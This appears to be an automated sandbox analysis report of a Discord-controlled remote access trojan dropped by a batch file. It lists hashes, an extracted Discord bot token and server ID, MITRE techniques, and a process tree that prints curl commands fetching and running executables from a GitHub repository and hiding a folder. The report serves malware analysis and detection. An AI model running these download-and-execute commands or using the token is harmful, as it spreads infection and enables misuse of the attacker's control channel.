discordrat | 5051740849cc567c88d930dbff64dbe995f400c68a2f8c25a38ccdd9f2b81359

Reason

Machine shutdown

General

Target

Sharp CS V1.bat
Size

433B
MD5

79f4dfedde066329feb0c23b9a95920d
SHA1

470bd43b15f11f0583e5357c1f8223ed688559b0
SHA256

5051740849cc567c88d930dbff64dbe995f400c68a2f8c25a38ccdd9f2b81359
SHA512

a5270495d09ade0056166b26cfb25be796bbf41e96639f3c69011eb1f4433829426f99e0878fcb882e0ccae91e2023cdf01ffb0c5dd22a7ce0f58eb5a09ccd5d

Score

10^/10

discordrat defense_evasion persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTI0MzQwMDg0MDc3NDE2MDM4NQ.GC8XoW.GV37ZmiRqKTJrla6I_LG3ievGgv1WoBnOGAfMw
server_id
1256556741160599562

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Packages.exeSystem.exe

pid process

4980 Packages.exe
1776 System.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

18 raw.githubusercontent.com
22 discord.com
24 discord.com
11 raw.githubusercontent.com
12 raw.githubusercontent.com
16 discord.com
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
defense_evasion

Hidden Files and Directories
T1564.001

Processes:

cmd.exe

pid process

3356 cmd.exe
Drops file in Program Files directory 2 IoCs

Processes:

curl.execurl.exe

description ioc process

File created C:\Program Files\System64\Packages.exe curl.exe
File created C:\Program Files\System64\System.exe curl.exe

pid	process
4980	Packages.exe
1776	System.exe

flow	ioc
18	raw.githubusercontent.com
22	discord.com
24	discord.com
11	raw.githubusercontent.com
12	raw.githubusercontent.com
16	discord.com

pid	process
3356	cmd.exe

description	ioc	process
File created	C:\Program Files\System64\Packages.exe	curl.exe
File created	C:\Program Files\System64\System.exe	curl.exe

Drops file in Windows directory 4 IoCs

Processes:

UserOOBEBroker.exe

description	ioc	process
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

System.exe

description pid process

Token: SeDebugPrivilege 1776 System.exe
Token: SeShutdownPrivilege 1776 System.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

OpenWith.exeOpenWith.exe

pid process

2688 OpenWith.exe
2880 OpenWith.exe

description	pid	process
Token: SeDebugPrivilege	1776	System.exe
Token: SeShutdownPrivilege	1776	System.exe

pid	process
2688	OpenWith.exe
2880	OpenWith.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

cmd.exePackages.execmd.execmd.exe

description	pid	process	target process
PID 3092 wrote to memory of 3148	3092	cmd.exe	curl.exe
PID 3092 wrote to memory of 3148	3092	cmd.exe	curl.exe
PID 3092 wrote to memory of 4632	3092	cmd.exe	curl.exe
PID 3092 wrote to memory of 4632	3092	cmd.exe	curl.exe
PID 3092 wrote to memory of 4980	3092	cmd.exe	Packages.exe
PID 3092 wrote to memory of 4980	3092	cmd.exe	Packages.exe
PID 3092 wrote to memory of 4980	3092	cmd.exe	Packages.exe
PID 3092 wrote to memory of 1776	3092	cmd.exe	System.exe
PID 3092 wrote to memory of 1776	3092	cmd.exe	System.exe
PID 4980 wrote to memory of 1136	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 1136	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 1136	4980	Packages.exe	cmd.exe
PID 1136 wrote to memory of 2536	1136	cmd.exe	mode.com
PID 1136 wrote to memory of 2536	1136	cmd.exe	mode.com
PID 1136 wrote to memory of 2536	1136	cmd.exe	mode.com
PID 4980 wrote to memory of 2660	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 2660	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 2660	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 1780	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 1780	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 1780	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 4712	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 4712	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 4712	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 3356	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 3356	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 3356	4980	Packages.exe	cmd.exe
PID 3356 wrote to memory of 3128	3356	cmd.exe	attrib.exe
PID 3356 wrote to memory of 3128	3356	cmd.exe	attrib.exe
PID 3356 wrote to memory of 3128	3356	cmd.exe	attrib.exe
PID 4980 wrote to memory of 4752	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 4752	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 4752	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 3876	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 3876	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 3876	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 4792	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 4792	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 4792	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 2784	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 2784	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 2784	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 2064	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 2064	4980	Packages.exe	cmd.exe
PID 4980 wrote to memory of 2064	4980	Packages.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3128 attrib.exe

pid	process
3128	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sharp CS V1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3092

C:\Windows\system32\curl.exe
curl -LJO https://github.com/LongYears9/tools/raw/master/System.exe
2⤵
- Drops file in Program Files directory
PID:3148

C:\Windows\system32\curl.exe
curl -LJO https://github.com/LongYears9/tools/raw/master/Packages.exe
2⤵
- Drops file in Program Files directory
PID:4632

C:\Program Files\System64\Packages.exe
"C:\Program Files\System64\Packages.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mode con:cols=0120 lines=0030
3⤵
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\SysWOW64\mode.com
mode con:cols=0120 lines=0030
4⤵
PID:2536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c title Window Title
3⤵
PID:2660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\myfiles" mkdir "C:\Users\Admin\AppData\Local\Temp\myfiles"
3⤵
PID:1780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Admin\AppData\Local\Temp\wtmpd"
3⤵
PID:4712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd
3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3356

C:\Windows\SysWOW64\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd
4⤵
- Views/modifies file attributes
PID:3128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\i6.t
3⤵
PID:4752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\i6.bat
3⤵
PID:3876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c
3⤵
PID:4792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c pause
3⤵
PID:2784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c
3⤵
PID:2064

C:\Program Files\System64\System.exe
"C:\Program Files\System64\System.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4812

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:4712

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:4900

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2688

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2880

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

2

T1564

Hidden Files and Directories

2

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\System64\Packages.exe
Filesize
83KB

MD5
e155e62ecf5be9131dadecb19213a92a

SHA1
9ed3d1543b037e901c8870bd360bd5d65e15bda1

SHA256
70e2268a76050c6354ad22b0b997a41a48d7148219f6459acd44aadabe3bc500

SHA512
fdc30e0fc2d98b27a7fd145247373e5a38856cacaf6f6f66f2716175a4e2ced25f7383a1a42c2c8863a937a345362748575db4a65945e29c3f787975e1402959

Download Submit
C:\Program Files\System64\System.exe
Filesize
78KB

MD5
3932b3da37a4b1ac396d52d624fd6c10

SHA1
92d9336e29373c317ab8c02005e6652f9515c63f

SHA256
d5b7c44ebd777e47a77ab3d8749b1c0de91c0c463cc525dd6fd57b7e9604ebab

SHA512
d0b43e227232b26032d15bc7430cfd90ef76629ee0064aa61c0585fe6465214801459a2108f5dc16d71dc5d0ee309d2afa28609d1a70f89d031437167b1c33c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\i6.bat
Filesize
173B

MD5
0f8f70e88009593eefaa155a8e31b1d6

SHA1
eabcc3f2135e0919e9456da0a4b1084f3382d4b6

SHA256
941c169c07670650fc6c6148c1cae068b69bac209e05010594e164aafc7cdf8b

SHA512
94df468b963f3c9d133a25e1ffa57039fac01fe960f0f738552ca6440e6242ff48d0b410fe70dd05a62e4842c925c9f2b0220ca9eb9cb4ff5490ada443c9a750

Download Submit
C:\Users\Admin\AppData\Local\Temp\i6.t
Filesize
3B

MD5
a5ea0ad9260b1550a14cc58d2c39b03d

SHA1
f0aedf295071ed34ab8c6a7692223d22b6a19841

SHA256
f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04

SHA512
7c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74

Download Submit
memory/1776-7-0x00007FFC003C3000-0x00007FFC003C5000-memory.dmp

Filesize
8KB

Download
memory/1776-8-0x0000028167C60000-0x0000028167C78000-memory.dmp

Filesize
96KB

Download
memory/1776-10-0x000002816A2E0000-0x000002816A4A2000-memory.dmp

Filesize
1.8MB

Download
memory/1776-11-0x00007FFC003C0000-0x00007FFC00E82000-memory.dmp

Filesize
10.8MB

Download
memory/1776-18-0x000002816B5B0000-0x000002816BAD8000-memory.dmp

Filesize
5.2MB

Download
memory/1776-19-0x00007FFC003C0000-0x00007FFC00E82000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

Errors